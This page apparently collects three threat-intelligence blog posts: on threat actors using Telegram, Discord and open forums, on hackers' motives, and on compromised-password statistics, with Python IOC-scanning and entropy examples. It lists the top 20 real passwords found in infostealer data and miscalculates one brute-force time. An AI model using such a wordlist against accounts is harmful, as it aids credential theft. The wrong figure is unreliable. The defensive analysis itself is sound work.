Articles Tagged with

SOS Intelligence Investigation

Investigation, Opinion

Beyond the Dark Web: Where Threat Actors Operate

The “dark web” has become something of a buzzword in recent years, often portrayed as the hidden underworld of the internet where cybercriminals operate in complete anonymity. For many, it conjures images of secret marketplaces, illicit data dumps, and hard-to-trace communications — all out of reach from the average internet user.

Because of this perception, it is a common misconception that all threat actor activity takes place exclusively on the dark web. While it certainly plays a role in enabling criminal operations, the truth is far more complex. Today’s threat actors are increasingly making use of platforms that are readily available, user-friendly, and in many cases, completely legal.

Much of their coordination, recruitment, and even data leakage now takes place in plain sight — across encrypted messaging apps, public forums, and mainstream social media platforms. Understanding where these actors truly operate is critical for any organisation looking to stay ahead of the threat landscape.

The Evolving Landscape of Threat Actor Platforms

The way threat actors communicate and coordinate has shifted significantly in recent years. Once heavily reliant on hidden services accessed through the Tor network, many cybercriminals are now embracing more accessible, mainstream platforms to conduct their activities.

This change has been driven by several key factors. One of the most prominent is the increased pressure from law enforcement. High-profile takedowns of dark web marketplaces such as AlphaBay and Hydra have disrupted long-standing criminal ecosystems, forcing actors to reconsider where and how they operate.

At the same time, modern platforms offer features that make them attractive to malicious users. Encrypted messaging apps provide a level of privacy that rivals, and in some cases exceeds, what is available on the dark web. Public forums and chat platforms are easy to access, require minimal technical knowledge, and can reach large audiences quickly.

For cybercriminals, scale and convenience matter. Hosting content on widely used services allows them to cast a broader net, whether they’re distributing stolen data, selling malware, or recruiting new affiliates. The lines between the open internet and covert criminal spaces are increasingly blurred, making it more difficult for defenders to track activity using traditional dark web monitoring alone.

Alternative Threat Actor Channels

While the dark web still plays a role in cybercriminal operations, many threat actors now prefer more accessible and user-friendly platforms. These alternatives offer speed, scalability, and often a surprising degree of anonymity — all without the need for specialised browsers or infrastructure. Below are some of the most commonly used non-dark web channels.

Telegram

Telegram has become a go-to platform for cybercriminals. With its end-to-end encryption, support for large group chats, and the ability to create private or public channels, it offers the ideal environment for discreet coordination at scale.

Threat actors use Telegram to:

  • Leak stolen data and documents
  • Advertise and sell credentials or access to compromised systems
  • Host scam pages or phishing kits
  • Organise affiliate networks or ransomware-as-a-service (RaaS) operations

Its minimal moderation and vast global user base make it a particularly attractive choice for cybercrime groups.

Discord and Other Chat Platforms

Originally designed for online gaming communities, Discord has evolved into a full-featured communication tool with support for text, voice, and private servers. Unfortunately, these same features have also made it a popular haven for fraudsters and cybercriminals.

Threat actors use Discord to:

  • Create closed communities centred around fraud, hacking tools, or data leaks
  • Share resources in “plug” communities — often focused on carding, identity theft, or botnet services
  • Coordinate attacks or distribute malware through seemingly innocuous links

Other platforms such as Tox, Matrix, and IRC-based services are also used, albeit with smaller user bases.

Surface Web Forums

Despite the risks of being in plain sight, many cybercrime forums continue to operate openly on the surface web. These forums are often language-specific or focused on particular sectors, such as financial fraud, social engineering, or credential stuffing.

They are typically used to:

  • Trade tools, tactics, and stolen data
  • Post tutorials or share exploit code
  • Vet and recruit participants for more private activities

Some forums operate with limited moderation or are hosted in jurisdictions with lax enforcement, allowing them to persist despite ongoing attention from security professionals.

Social Media (Twitter/X, Facebook, etc.)

Social media platforms remain surprisingly popular for certain types of threat actor activity. On services like Twitter/X, Facebook, and even LinkedIn, cybercriminals can quickly build audiences, push propaganda, or leak stolen information to make a statement.

Common uses include:

  • Publicly claiming responsibility for attacks or breaches
  • Promoting data leaks to gain notoriety or apply pressure to victims
  • Running influence campaigns or disinformation efforts
  • Recruiting low-level actors or collaborators

While these platforms generally respond quickly to takedown requests, the speed at which content can be published and spread makes them a persistent threat vector.

Paste Sites and Temporary File Hosts

Pastebin-style sites and ephemeral file hosting services continue to be used by cybercriminals to share content without needing to manage infrastructure. These services are often exploited to distribute:

  • Malware payloads
  • Indicators of compromise (IOCs)
  • Stolen credentials or internal documentation

Examples include Pastebin, Ghostbin, file.io, and anonfiles (when active). Their simplicity and temporary nature make them appealing for one-off drops or fast-moving campaigns.

Why the Shift Away from the Dark Web?

While the dark web once provided the primary infrastructure for cybercriminal marketplaces and forums, it has become a less attractive option for many threat actors. A combination of practical challenges and strategic advantages has led to a growing preference for mainstream and surface-level platforms.

One of the key drivers behind this shift is the increasing success of global law enforcement operations. High-profile takedowns such as AlphaBay, Hansa, and Hydra have not only dismantled major criminal marketplaces but also sown distrust within dark web communities. With undercover operations and seizures now a recurring threat, many actors perceive mainstream platforms as less risky in terms of operational security, particularly when combined with disposable accounts and encrypted messaging.

Technical reliability is another issue. Dark web services can suffer from poor uptime, slow performance, and hosting instability. These problems make it harder for threat actors to run consistent operations or maintain communication, especially when compared to the seamless experience offered by platforms like Telegram or Discord.

Accessibility also plays a major role. Mainstream platforms are far easier to use and require no special configuration or tools. Anyone with a smartphone can join a Telegram group or browse a fraud forum hosted on the surface web. This lowers the barrier to entry for newer or less technically skilled actors, fuelling growth in cybercriminal communities.

Finally, these platforms offer scale. Social media, public channels, and open forums provide instant access to large audiences, whether for pushing stolen data, coordinating campaigns, or recruiting collaborators. The potential for amplification far exceeds what is typically possible within the confines of the dark web.

For all these reasons, the dark web is no longer the sole or even primary location for cybercriminal activity. Threat actors are adapting to a broader, more dynamic digital environment, and defenders must do the same.

Implications for Threat Intelligence Teams

As threat actors diversify their platforms, the scope of effective cyber threat intelligence (CTI) must evolve accordingly. Relying solely on dark web monitoring is no longer sufficient. Instead, teams must broaden their visibility to include the various surface and semi-private spaces where cybercriminal activity increasingly takes place.

Monitoring closed channels such as Telegram groups, Discord servers, and niche forums has become essential. However, these spaces are often harder to access and require greater care in terms of operational security (OPSEC). Joining or observing these groups can carry significant risk if not done properly. Analysts must use hardened environments, anonymous accounts, and clear protocols to avoid detection or legal exposure.

Language skills and cultural awareness are also becoming increasingly important. Many cybercrime communities operate in non-English languages and use regional slang or coded terminology. Without this context, valuable intelligence can be missed or misinterpreted. Investing in native language analysts or translation tools can dramatically improve coverage and insight.

The scale and speed at which content is published across platforms make manual monitoring impractical. As such, automation is vital. Tools that scrape and index Telegram posts, track mentions on social media, or flag emerging IOCs can help intelligence teams respond quickly and reduce the chance of missing key developments.
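The kind of automation described here, as an added example that is not SOS Intelligence's tooling: a small scanner that runs over constructed sample posts (standing in for scraped Telegram, paste-site and social media content), refangs the usual `hxxp` / `[.]` obfuscation, pulls out IPv4 addresses, SHA-256 hashes and domains, and raises an alert when a post mentions a watchlisted organisation name or carries an indicator. The posts, the `ExampleCorp` watchlist entry and the indicator values are all constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample posts standing in for scraped Telegram/paste/social content.
SAMPLE_POSTS = [
    {"source": "telegram", "channel": "example_leaks",
     "text": "Fresh dump from ExampleCorp, DM me. Sample at hxxp://drop.example[.]net/files, host 10.0.0.5"},
    {"source": "pastebin", "channel": "paste/abc123",
     "text": "loader sha256 " + "a" * 64 + " beacons to 203.0.113.7"},
    {"source": "twitter", "channel": "@random_user",
     "text": "nothing to see here, just cat pictures"},
]

# Organisation names and brands the team wants flagged (constructed watchlist).
WATCHLIST = {"examplecorp", "example corp"}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"\b[a-f0-9]{64}\b", re.IGNORECASE)
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:net|com|org|io)\b", re.IGNORECASE)


def refang(text: str) -> str:
    """Undo the common 'hxxp' / '[.]' defanging so the indicator regexes match."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def extract_iocs(text: str) -> dict:
    """Return de-duplicated, sorted indicators found in one post."""
    t = refang(text)
    return {
        "ipv4": sorted(set(IPV4_RE.findall(t))),
        "sha256": sorted(s.lower() for s in set(SHA256_RE.findall(t))),
        "domain": sorted(d.lower() for d in set(DOMAIN_RE.findall(t))),
    }


def matched_keywords(text: str, watchlist) -> list:
    """Case-insensitive substring match of watchlist terms against the post."""
    low = text.lower()
    return [kw for kw in sorted(watchlist) if kw in low]


@dataclass
class Alert:
    source: str
    channel: str
    keywords: list
    iocs: dict


def scan_posts(posts, watchlist=WATCHLIST) -> list:
    """Raise one Alert per post that mentions a watchlisted name or carries an indicator."""
    alerts = []
    for post in posts:
        kws = matched_keywords(post["text"], watchlist)
        iocs = extract_iocs(post["text"])
        if kws or any(iocs.values()):
            alerts.append(Alert(post["source"], post["channel"], kws, iocs))
    return alerts


if __name__ == "__main__":
    for alert in scan_posts(SAMPLE_POSTS):
        print(alert)
```

In practice the watchlist would hold the organisation's own brands, domains and executive names, and the indicator lists would be checked against existing threat intelligence before anyone is paged; the point of the example is that the matching logic is simple enough that the hard part is collection and OPSEC, not parsing.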

Ultimately, the shift in threat actor behaviour demands a shift in defender strategy. The more fragmented and accessible the threat landscape becomes, the more agile and well-equipped CTI teams need to be in order to stay ahead.

Case Examples

LockBit’s Use of Telegram for PR and Leak Amplification (2024)

In early 2024, after suffering internal leaks and DDoS attacks against their dark web leak site, the LockBit ransomware group turned to Telegram to regain control of their narrative. The group created public Telegram channels to share statements, leak victim data, and coordinate with affiliates. This move not only ensured continuity during technical outages but also expanded their audience beyond the dark web’s limited reach.

Telegram’s encryption, ease of access, and built-in forwarding features allowed LockBit to amplify their message rapidly, including to journalists, researchers, and rival threat actors. It showcased a tactical shift: using mainstream tools as a parallel infrastructure for both influence and extortion pressure.

“Infinity Stealer” Malware Sold via Discord and GitHub (Mid-2023 Onwards)

Infinity Stealer, a malware strain targeting browser credentials and crypto wallets, began circulating heavily in 2023 via non-dark web platforms, notably Discord and GitHub. The malware was marketed in private Discord servers where prospective buyers were vetted and provided updates. GitHub repositories were used to host payloads, configuration templates, and instructions, often disguised as open-source tools.

This campaign highlights how cybercriminals are bypassing traditional marketplaces entirely, instead using legitimate platforms for both sales and delivery infrastructure. Discord’s private server structure and GitHub’s reputational cover enabled the operators to fly under the radar while still reaching a large pool of technically capable users.

Conclusion

The dark web remains a valuable source of cyber threat intelligence — but it is no longer the whole story. As cybercriminals adapt to a shifting digital landscape, they are increasingly leveraging open and semi-closed platforms like Telegram, Discord, and even mainstream social media to conduct and promote their activities.

For CTI teams, this evolution demands a broader approach. Effective monitoring now extends beyond Tor and onion domains to include a mix of channels, each with its own risks, nuances, and intelligence value. It also requires enhanced OPSEC, linguistic awareness, and the integration of automation tools to track activity at scale.

By recognising these trends and adapting monitoring strategies accordingly, defenders can stay better aligned with the current threat environment — one that is faster, more fragmented, and no longer confined to the shadows.

Investigation, Opinion

Why Hackers Hack: Exploring What Motivates Cybercriminal Activity

Cybercrime continues to rise in scale, complexity and impact, affecting individuals, businesses and governments alike. While much attention is given to how attacks happen, it’s just as important to ask why they occur in the first place. Understanding what motivates attackers is a crucial part of building an effective defence.

So, why do hackers hack?

Some are driven by financial gain, while others act on behalf of a nation-state or in support of a political cause. There are those motivated by revenge or personal challenge, and others who simply exploit opportunities because they can.

In this post, we explore the key motivations behind cybercriminal activity, helping you better understand the intent behind the threat and its implications for your organisation’s security posture.

Financial Gain

For many cybercriminals, money is the primary motivator. The vast majority of cybercrime is financially driven, with threat actors seeking to extract value from individuals, businesses or governments through theft, fraud or extortion.

Ransomware is perhaps the most well-known example. Attackers encrypt a victim’s data and demand payment, usually in cryptocurrency, in exchange for the decryption key. The rise of Ransomware-as-a-Service (RaaS) has made these attacks more accessible, allowing less technically skilled criminals to launch sophisticated campaigns using tools developed by others.

One of the most notorious examples of financially motivated cybercrime is Evil Corp, a Russia-based cybercrime group responsible for developing and distributing the Dridex banking Trojan and BitPaymer ransomware. The group, led by Maksim Yakubets, has been linked to attacks that have caused hundreds of millions of pounds in damages globally. According to the U.S. Department of the Treasury, Yakubets was allegedly tasked by Russian intelligence to conduct espionage operations alongside his cybercriminal activities. He is known not just for the scale of his crimes, but also for flaunting his wealth—reportedly driving a Lamborghini with a personalised number plate that reads “THIEF”.

Phishing and business email compromise (BEC) are also common financially motivated attacks. These techniques are designed to trick victims into handing over login credentials, payment details or other sensitive information that can be monetised directly or resold on dark web marketplaces. The FBI has reported billions of dollars in losses from BEC schemes, which often involve attackers impersonating executives or suppliers to redirect large financial transactions.

What’s particularly concerning is how mature and professionalised the cybercriminal ecosystem has become. Online forums and marketplaces, often hosted on the dark web, serve as thriving hubs where criminals buy and sell tools, data and services. This includes malware, exploit kits, stolen credentials and even technical support for other attackers. Some actors specialise in initial access, others in data theft or extortion, and many operate purely as brokers or facilitators.

As a result, modern cyberattacks are rarely the work of a lone hacker. Instead, they often involve multiple actors working together across a decentralised and anonymous marketplace. For a relatively low cost, almost anyone can purchase the tools and expertise needed to carry out a breach.

With high rewards and limited risk in many jurisdictions, financially motivated cybercrime remains one of the most significant threats facing organisations today.

Ideological or Political Motivation (Hacktivism)

Not all cybercriminals are driven by profit. Some are motivated by political beliefs, social causes or ideologies. These individuals or groups, often referred to as hacktivists, use hacking as a form of protest, aiming to disrupt, expose or embarrass organisations and governments they oppose.

One of the most recognisable hacktivist collectives is Anonymous, a loosely organised group known for its cyber campaigns against governments, corporations and extremist groups. Their activities have ranged from distributed denial of service (DDoS) attacks on financial institutions, to leaking sensitive documents from law enforcement agencies and political bodies.

Hacktivism has also played a prominent role in modern conflicts. In the early days of the Russia–Ukraine war, groups on both sides of the conflict engaged in cyber operations. Ukrainian-aligned actors, including the so-called IT Army of Ukraine, targeted Russian government websites and media outlets with defacements and DDoS attacks. Meanwhile, pro-Russian hacktivist groups like Killnet have launched attacks against European infrastructure in retaliation for political support of Ukraine.

These operations are not always highly technical, but they can be disruptive and attention-grabbing. For example, in 2022, Killnet claimed responsibility for attacks on several websites belonging to airports, healthcare providers and public institutions across Europe, using basic but effective DDoS techniques.

Hacktivism can blur the line between political protest and criminal activity. While some view it as a legitimate form of dissent in the digital age, it often involves illegal access, data leaks or service disruption, and can escalate geopolitical tensions or cause collateral damage to innocent third parties.

For defenders, politically motivated attacks pose a unique challenge. They may not follow the typical patterns of financially driven crime, and their targets can shift quickly based on current events, perceived injustices or ideological trends.

State-Sponsored Espionage

Some of the most advanced and persistent cyber threats come not from criminals seeking profit, but from nation-states pursuing strategic objectives. These attacks are often aimed at gathering intelligence, disrupting rivals, or gaining long-term access to critical systems. Unlike financially motivated actors, state-sponsored groups tend to operate with significant resources, patience and stealth.

These threat actors—often referred to as Advanced Persistent Threats (APTs)—typically target government departments, defence contractors, critical national infrastructure, and major corporations. Their goal may be to steal sensitive data, conduct surveillance, interfere with democratic processes, or enable future sabotage.

A prominent example is APT29, also known as Cozy Bear, a group linked to Russia’s Foreign Intelligence Service (SVR). They have been implicated in numerous high-profile intrusions, including the 2020 SolarWinds supply chain attack, which compromised several US federal agencies and global private sector organisations. The operation was notable for its sophistication and subtlety, remaining undetected for months.

Similarly, APT10, associated with China’s Ministry of State Security, was involved in an extensive global cyber espionage campaign targeting managed service providers (MSPs). By compromising these third-party IT providers, APT10 was able to access a wide range of downstream client networks, including government and corporate systems in the UK, US and beyond.

Unlike typical cybercriminals, these groups are often protected by their host governments and operate with impunity. They may also work in parallel with criminal organisations, blurring the lines between state and non-state activity. For example, some ransomware attacks have been linked to actors with suspected ties to nation-states, suggesting a dual-purpose intent: generating revenue while causing strategic disruption.

The motivations behind state-sponsored cyber operations are diverse, ranging from political influence and military advantage to intellectual property theft and economic gain. These campaigns are rarely random; they are calculated, well-resourced and long-term in nature.

For organisations, this means traditional defences may not be enough. Combating espionage-level threats requires a heightened focus on detection, incident response and threat intelligence, particularly for those in sensitive sectors.

Corporate or Industrial Espionage

Businesses, particularly those with valuable intellectual property and trade secrets, are prime targets for corporate or industrial espionage. Cybercriminals and competing organisations alike seek to gain an unfair advantage by stealing sensitive data related to research and development (R&D), product designs, strategic plans or proprietary technologies.

This type of espionage often overlaps with state-sponsored cyber operations, where nation-states target foreign companies to bolster their own industries or military capabilities. A notable example is the Operation Aurora campaign, uncovered in 2010, where threat actors believed to be linked to China targeted Google and dozens of other major companies. The attackers aimed to steal intellectual property and gain access to corporate networks.

Similarly, in 2021, the US Department of Justice indicted members of a Chinese hacking group known as APT41 for conducting widespread cyber intrusions into video game companies and technology firms, stealing source code and proprietary information to benefit commercial interests.

R&D-heavy sectors such as biotechnology, aerospace, automotive and software development face particularly high risks. The theft of trade secrets not only undermines a company’s competitive edge but can also result in substantial financial losses and damage to reputation.

Unlike typical financially motivated attacks, corporate espionage campaigns are usually stealthy and meticulously planned. Attackers may maintain prolonged access to compromised networks, gathering intelligence over months or even years to extract maximum value.

Organisations must therefore prioritise safeguarding their intellectual property through robust cybersecurity measures, employee awareness, and stringent access controls. Collaboration with industry partners and government agencies can also help in detecting and mitigating these sophisticated threats.

Personal Challenge or Prestige

For some hackers, the motivation is less about money or politics and more about curiosity, thrill-seeking, or the desire for recognition within their communities. These individuals often see hacking as a puzzle to be solved or a challenge to be conquered, gaining personal satisfaction and prestige among peers.

This motivation is particularly common among younger or amateur hackers, sometimes referred to as “script kiddies”, who may lack advanced skills but are eager to prove themselves by exploiting vulnerabilities or defacing websites. The hacking community online—including forums, social media groups and dark web marketplaces—can foster this behaviour, offering a platform for sharing exploits, bragging rights and reputation-building.

A notable example is the hacktivist group LulzSec, which gained international attention in 2011 through a series of high-profile attacks targeting organisations like Sony, the CIA, and PBS. Their actions were largely driven by the desire to embarrass their victims and entertain themselves, rather than for financial gain or political objectives.

Similarly, the case of Jonathan James, a teenage hacker from the United States, illustrates this motivation. At just 15 years old, James infiltrated several government systems, including NASA, stealing source code and causing significant disruption. His actions seemed motivated by the challenge and thrill of hacking rather than monetary rewards.

While these hackers might not always intend serious harm, their actions can have unintended consequences: disrupting services, compromising data, or exposing vulnerabilities that other malicious actors might exploit.

Revenge or Personal Grievances

Not all cyber threats originate externally—sometimes the greatest risks come from insiders motivated by personal grudges or feelings of revenge. Disgruntled employees, former staff or contractors with authorised access can deliberately cause harm to an organisation by leaking sensitive information, sabotaging systems or stealing data.

One of the most infamous cases involved Edward Snowden, a former NSA contractor who leaked vast amounts of classified information, motivated by a personal belief that the public had the right to know about government surveillance programmes. Though his actions sparked worldwide debate on privacy, they also caused significant damage to intelligence operations.

In the corporate sphere, a UK-based case saw a former IT administrator take revenge after being dismissed by deleting critical files and disabling user accounts, resulting in days of downtime and financial loss.

Such incidents highlight the critical importance of internal controls, thorough monitoring and robust offboarding procedures. Regularly reviewing access rights, implementing the principle of least privilege, and monitoring unusual activity can help detect and prevent insider threats before they escalate.

Organisations must balance trust with vigilance, fostering a positive workplace culture while ensuring employees understand the consequences of malicious actions.

Opportunistic or Accidental Hacking

Not all cyberattacks are the result of carefully planned operations. Many stem from opportunistic or accidental hacking, where attackers use automated tools to scan large numbers of systems for common vulnerabilities. These attacks require minimal effort but can still cause significant damage, especially to organisations or individuals with poor basic cyber hygiene.

Automated bots and scripts regularly probe the internet for unpatched software, weak passwords, misconfigured devices, or open ports. Once a vulnerability is found, the attacker may exploit it to gain access, often without a specific target in mind. This “spray and pray” approach relies on volume rather than precision.

For example, the WannaCry ransomware outbreak in 2017 rapidly spread across the globe by exploiting a known Windows vulnerability. Many affected organisations had failed to apply critical patches, making them vulnerable to this widespread, indiscriminate attack.

These types of attacks highlight the importance of fundamental cybersecurity practices: regularly updating software, using strong, unique passwords, enabling multi-factor authentication, and maintaining good network hygiene. Even basic measures can significantly reduce the risk posed by opportunistic attackers.

While opportunistic hacking might lack the sophistication or motive of targeted attacks, its impact can be equally devastating if proper precautions are not taken.

Mixed Motivations

In reality, cybercriminal motivations are often complex and overlapping rather than clear-cut. Many attacks are driven by a combination of factors—financial, political, ideological, or personal—which can make attribution and defence especially challenging.

A common scenario involves financially motivated cybercriminal groups being hired or tolerated by state actors to carry out attacks that serve national interests. These groups operate with relative impunity in exchange for providing offensive cyber capabilities or disruptive services.

For example, the notorious ransomware group REvil (also known as Sodinokibi) has been linked to criminal operations that sometimes intersect with geopolitical objectives. While primarily motivated by profit through ransomware extortion, there are indications that some affiliates have conducted operations aligning with certain state interests or received indirect protection from their home governments.

Such hybrid motivations complicate the threat landscape, blurring the lines between organised crime and state-sponsored espionage or sabotage. For defenders, understanding these intertwined incentives is crucial for developing effective cyber defence strategies and threat intelligence.

Conclusion

Cybercriminals are motivated by a wide and varied range of factors—from financial gain and political agendas to personal grudges and the pursuit of prestige. Understanding these diverse motivations is essential for organisations seeking to build effective defences in an increasingly complex cyber threat landscape.

By recognising what drives threat actors, businesses and individuals can better anticipate potential attack vectors, prioritise security investments, and tailor their incident response strategies accordingly. A threat-informed defence approach goes beyond technical measures, incorporating intelligence, awareness and proactive risk management.

As cyber threats continue to evolve, adopting a comprehensive, informed security posture is no longer optional—it is vital. Organisations should take active steps to understand their adversaries, strengthen their defences, and cultivate a culture of vigilance to stay ahead in the ongoing battle against cybercrime.

Header Photo by Furkan Elveren on Unsplash

Uncategorized

Compromised Password Analysis

How threat actors target your credentials and what you can do to protect yourself

Across the dark web, and the shadier parts of the clear web, there is a booming marketplace for compromised credentials. Threat actors looking to make a quick return can monetise your sensitive data, leaving you vulnerable to further compromise. So how do threat actors get hold of your credentials, and what can you do to protect yourself?

How do threat actors get your credentials?

Threat actors have an arsenal of tools and techniques for obtaining credentials to facilitate further criminal activity. These range from the highly technical, to the meticulously researched, to plain and simple brute force. We discuss a sample of these techniques below to help you understand how threat actors can obtain your credentials.

Malware

For the more technically-minded, malware can be utilised to intercept passwords being input across the internet, or just simply to steal passwords from your device.

A “man-in-the-middle” attack sees a threat actor position themselves between a victim and the service the victim is accessing. While the victim is inputting their credentials, the threat actor can see the input and capture it for their own use. This technique has commonly been used by banking trojans such as TrickBot.

Once installed on a victim’s device, TrickBot would identify when the victim attempted to access banking services online and present them with a cloned website controlled by the threat actor. The threat actor could then see what the victim was typing and so capture their login details. To preserve the illusion that nothing was amiss, the victim would then be redirected to the legitimate site as if they had logged in normally, while the threat actor kept the captured credentials to log in whenever they saw fit.

Infostealer malware is much simpler.  Once installed on a device, it can quickly query common areas of a device used for password storage, and send this data to a waiting server controlled by a threat actor.  Owing to the various deployment methods used, threat actors can quickly generate a large volume of content from infostealer malware.  This content is then sorted and sold online, or at times even given away.  Further information regarding infostealer malware can be found in our article here.

Phishing

Phishing requires an element of trickery from the threat actor. They portray themselves as something they aren’t in order to trick the victim into divulging their credentials. This often takes the form of a message (email, SMS etc.) asking the victim to confirm their credentials for a legitimate service, such as a bank or a premium service like Netflix. The threat actor will also provide a convenient link for the victim; however, this link will invariably lead to a cloned website controlled by the threat actor, who can then collect credentials as victims enter them.

Social Engineering

Remembering passwords for all the different services we use can be tiresome.  It has been estimated that the average person has over 100 passwords to remember.  It’s therefore only natural that we draw on the things in our lives that matter most when coming up with passwords: significant dates, names of pets, and our favourite locations.  All of these are useful when creating passwords because you’re more likely to remember them.

The problem comes with our online activity.  Many people are very public about what they post online, and we talk about the things we like and what’s important to us.  If we’re then using those important things to generate our passwords, it becomes very easy for threat actors to do a little research into us to discover those passwords for themselves.

As an example, we have identified within our data collections that “fiona2014” is one of the most commonly used passwords.  If someone were using this password, it could be very easy to obtain it through social engineering.  It would be straightforward to talk to someone, engage them about their life, and quickly find out they have a daughter called Fiona who is 10 years old.  Putting these details together, we arrive at “fiona2014”.

Dictionary Attacks

We are inundated with accounts requiring passwords, so it is common for people to use simple passwords to avoid having to remember anything too complex.  Threat actors rely on this as the basis for a “dictionary attack”.  Years of password data have allowed files to be generated containing thousands of common passwords and their variants.  Armed with a victim’s email address, a threat actor can then use these files to query a service, trying each password until the service allows them to log in.

Thankfully, dictionary attacks are somewhat easier to defend against.  Most services will now only allow a few login attempts before any suspicious activity is flagged and the account is locked down.  Threat actors will constantly look for methods to bypass this security, so the best option is to keep those passwords unique.

Brute Force

When finesse will not work, take a sledgehammer to the door.  Brute force requires a threat actor to have some coding knowledge.  They can write code which queries a service to attempt a login, but rather than being methodical, this method is more trial and error.  Commonly, brute force attacks will iterate through millions of potential combinations to find the correct password (assuming that any security the service has does not lock the account).  This method can be more easily defeated by using longer, more complex passwords, and we will explain why shortly.

Brute force attacks can also occur when a threat actor obtains a username:password combination for a particular site.  Banking on poor password hygiene, they will attempt the same combination across multiple sites to see if there has been any password reuse.

What happens when your credentials are compromised

What happens when credentials are compromised depends on who the victim is.

Compromise of personal accounts tends to provide threat actors with access to various services and information, including the victim’s banking, online shopping, premium entertainment services etc.  These have some value to others, who may want the benefits of those services without having to pay, e.g. to watch Netflix or listen to Spotify.  Such data will often be grouped and sold in bulk on online forums for a fraction of the cost of the service it gives access to.

Real value for threat actors comes from compromised corporate accounts.  These accounts allow a threat actor to access a corporate system, giving them a platform to launch further criminal activity.  There is an entire marketplace dedicated to gaining initial access to corporate systems – initial access brokerage – and, depending on the size of the victim, it can bring in thousands of pounds for the threat actor selling the credentials.  Such access can be a precursor to more serious cybersecurity events, such as data theft/loss, or the deployment of ransomware.

Password hygiene and habits

Now for the statistics.

We have taken a sample of data collated by SOS Intelligence in March 2024, totalling over 10 million passwords obtained by infostealer malware.

The most common password length was 8 characters, with an average length across the dataset of 10.5.  This was to be expected as 8 characters is often presented as a minimum across many password policies.  Additionally, it’s also the number of characters in “password”…

Top 20 most common passwords

Password        Count
123456          51022
admin           22322
https           16682
12345678        16525
123456789       15737
12345           8958
Profiles        8611
password        6533
Opera           3946
1234567890      3326
123123          3093
1234567         2923
Aa123456        2866
Kubiak22        2821
Pass@123        2761
Password        2665
111111          2488
fiona2014       2206
12345678910     2043
P@ssw0rd        2029

On that note, the word “password”, and numerous variants using common character substitutions, appeared over 37,000 times.  “admin” appeared more than 22,000 times, while “https” was used more than 16,000 times.  This is concerning, as dictionary attacks will often focus on keywords such as these first, knowing they are so common.  “admin” is frequently used as a default password on routers and other IoT devices, which highlights the ongoing vulnerability of these devices.

In total, approximately 1 million passwords contained only digits, while approximately another 1 million contained only letter characters.  Overall, over 7.5 million passwords contained no special characters.

So the fundamental question is, why are these statistics important, and how can we use them to improve our password hygiene?

Password strength works based on “entropy” – the measure of randomness or uncertainty of the password.  Password entropy allows us to quantify the difficulty or effort required to guess, or “crack”, a password using brute force or other similar methods.  As a general rule, higher entropy passwords are deemed stronger and more secure.

We measure entropy in bits. The number of bits a password has indicates how strong it is.  The basic formula for calculating entropy looks like this:

Entropy = log2(N^L) = L × log2(N)

Where:

  • N is the number of possible characters in the character set used for the password
  • L is the length of the password (in characters)
  • log2 is the base-2 logarithm

Taking this formula, we can see that the longer a password is, and the larger the character set it draws from, the higher its entropy will be.  We can visualise this with our data.

Using a length of 8 (being the most commonly seen) we can see the entropy when different sizes of character sets are used:


                         Numerical   Single Case   All Case   Alphanumeric   Alphanumeric w/ Special Characters
Total # of characters    10          26            52         62             92
Entropy                  26.58       37.60         45.60      47.63          52.19

If we increase the password length to 12, strength increases significantly:


                         Numerical   Single Case   All Case   Alphanumeric   Alphanumeric w/ Special Characters
Total # of characters    10          26            52         62             92
Entropy                  39.86       56.41         68.41      71.45          78.28

Based on the above, working at 1000 guesses per second, a brute force attack on an 8-character numerical password would take about 27 hours.  However, a similar attack on a 12-character password utilising alphanumeric and special characters would take roughly 11.5 billion years!

The key point to note here is that there is a reason we’re always asked for longer passwords with uppercase, lowercase, numbers and special characters – they are that much stronger and more secure.
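The formula and the two tables above, carried through in code as an added example (not a calculator from the article): entropy_bits and entropy_table reproduce the article's figures, exhaustive_search_seconds gives the 1000-guesses-per-second estimate, and effective_bits adds the caveat the formula alone misses, which the dictionary attack section touched on: a password that sits in a wordlist such as the top 20 above costs an attacker only log2(rank) guesses, however long or mixed it looks. The top-20 list is taken from the article; how a given string is assigned to one of the article's character pools is this example's own assumption.

```python
import math

# Character-pool sizes exactly as in the article's two entropy tables.
CHARSET_SIZES = {
    "numerical": 10,
    "single case": 26,
    "all case": 52,
    "alphanumeric": 62,
    "alphanumeric w/ special characters": 92,
}

# The article's top-20 passwords in rank order (counts omitted), standing in for
# the wordlist a dictionary attack tries first.
TOP_20 = [
    "123456", "admin", "https", "12345678", "123456789", "12345", "Profiles",
    "password", "Opera", "1234567890", "123123", "1234567", "Aa123456",
    "Kubiak22", "Pass@123", "Password", "111111", "fiona2014", "12345678910",
    "P@ssw0rd",
]


def entropy_bits(charset_size: int, length: int) -> float:
    """Entropy = log2(N^L) = L * log2(N) for a password chosen uniformly from N symbols."""
    if charset_size < 2 or length < 1:
        raise ValueError("need at least two symbols and a length of at least one")
    return length * math.log2(charset_size)


def entropy_table(length: int) -> dict:
    """One row of the article's tables: entropy for each pool at a fixed length."""
    return {name: round(entropy_bits(n, length), 2) for name, n in CHARSET_SIZES.items()}


def exhaustive_search_seconds(charset_size: int, length: int,
                              guesses_per_second: float = 1000.0) -> float:
    """Worst case for a brute-force attack: all N^L candidates tried at the given rate."""
    return charset_size ** length / guesses_per_second


def pool_for(password: str) -> str:
    """Which of the article's pools a password draws from, judged by the characters
    it actually contains (an assumption of this example, not a rule from the article)."""
    has_digit = any(c.isdigit() for c in password)
    has_lower = any(c.islower() for c in password)
    has_upper = any(c.isupper() for c in password)
    has_other = any(not c.isalnum() for c in password)
    if has_other:
        return "alphanumeric w/ special characters"
    if has_digit and (has_lower or has_upper):
        return "alphanumeric"
    if has_lower and has_upper:
        return "all case"
    if has_lower or has_upper:
        return "single case"
    return "numerical"


def effective_bits(password: str, wordlist=TOP_20) -> float:
    """Bits of work an attacker really needs for this password.

    The formula assumes a uniformly random choice. A password at rank r in the
    wordlist the attacker tries first falls after at most r guesses, i.e. log2(r)
    bits, no matter how long or mixed it looks. Returns the smaller of the two.
    """
    formula = entropy_bits(CHARSET_SIZES[pool_for(password)], len(password))
    if password in wordlist:
        return min(formula, math.log2(wordlist.index(password) + 1))
    return formula


if __name__ == "__main__":
    for length in (8, 12):
        print(f"length {length}: {entropy_table(length)}")
    hours = exhaustive_search_seconds(10, 8) / 3600
    print(f"8-digit numerical password at 1000 guesses/s: {hours:.1f} hours")
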